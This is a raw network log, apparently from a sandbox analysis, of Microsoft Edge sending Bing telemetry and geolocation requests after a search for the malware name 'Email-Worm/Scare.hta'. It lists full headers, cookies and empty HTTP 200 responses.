cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df641
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.CookieGetBlocked%22%2C%22TS%22%3A1741747023458%2C%22Name%22%3A%22%22%2C%22FID%22%3A%22dsc%22%7D%2C%7B%22Text%22%3A%220%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.CookieGetBlocked%22%2C%22TS%22%3A1741747023458%2C%22Name%22%3A%22%22%2C%22FID%22%3A%22dsc%22%7D%2C%7B%22Text%22%3A%220%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df64c
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialConfigDisabled%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialConfigDisabled%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df650
GET

https://www.bing.com/geolocation/write?isBlocked=true&sid=24C008279C1E694D33C41D8A9D3668C7&clientsid=undefined

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /geolocation/write?isBlocked=true&sid=24C008279C1E694D33C41D8A9D3668C7&clientsid=undefined HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df651
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023483%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023483%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df665
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023483%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023483%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
